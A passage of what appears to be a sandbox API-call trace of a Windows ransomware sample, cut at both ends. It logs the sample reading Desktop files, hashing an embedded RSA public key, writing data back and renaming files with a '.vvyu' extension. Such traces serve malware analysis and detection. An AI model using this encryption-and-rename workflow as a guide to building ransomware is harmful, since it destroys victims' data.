Flags=0x0, Size=0x64) returned 0x673558 [0192.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.988] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0192.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.988] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0192.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0192.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0192.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93738 [0192.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0192.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.989] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93798 [0192.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937b0 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93750 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93720 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea6bf0 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6e00 [0192.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.990] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0192.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0192.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea7018 [0192.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.991] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.992] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e00 | out: hHeap=0x620000) returned 1 [0192.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea7018 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.994] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95608 | out: hHeap=0x620000) returned 1 [0192.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6bf0 | out: hHeap=0x620000) returned 1 [0192.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0192.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0192.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.998] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0a68*, nNumberOfBytesToWrite=0x6172, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea0a68*, lpNumberOfBytesWritten=0x312fb14*=0x6172, lpOverlapped=0x0) returned 1 [0192.998] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0192.998] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x6177, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.999] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0192.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0192.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.002] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.002] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.002] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.002] CloseHandle (hObject=0x568) returned 1 [0193.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea0a68 [0193.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.004] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\tHLd WYzw.ots" (normalized: "c:\\users\\keecfmwgj\\desktop\\thld wyzw.ots"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\tHLd WYzw.ots.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\thld wyzw.ots.vvyu")) returned 1 [0193.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.006] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.009] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5da4cd0, ftCreationTime.dwHighDateTime=0x1d8a41d, ftLastAccessTime.dwLowDateTime=0x21ebf50, ftLastAccessTime.dwHighDateTime=0x1d8a69f, ftLastWriteTime.dwLowDateTime=0x21ebf50, ftLastWriteTime.dwHighDateTime=0x1d8a69f, nFileSizeHigh=0x0, nFileSizeLow=0x14b79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="US8ywh8D_vcXiYflf5e.m4a", cAlternateFileName="US8YWH~1.M4A")) returned 1 [0193.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95608 [0193.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0193.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95608 | out: hHeap=0x620000) returned 1 [0193.009] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\US8ywh8D_vcXiYflf5e.m4a") returned=".m4a" [0193.009] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\US8ywh8D_vcXiYflf5e.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\us8ywh8d_vcxiyflf5e.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.010] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=84857) returned 1 [0193.010] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.013] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x14b53, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.013] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.015] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.016] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x14b79, lpOverlapped=0x0) returned 1 [0193.017] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.017] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.017] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.017] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.018] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.018] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.018] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.018] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.018] GetLastError () returned 0x0 [0193.019] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.019] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.019] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.019] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.019] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14b80) returned 0x2ea79b0 [0193.020] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95608 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95650 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.021] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0193.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0193.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93750 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93738 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0193.022] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0193.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0193.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | out: hHeap=0x620000) returned 1 [0193.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.024] GetCurrentThreadId () returned 0x66c [0193.024] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.024] RtlAllocateHeap 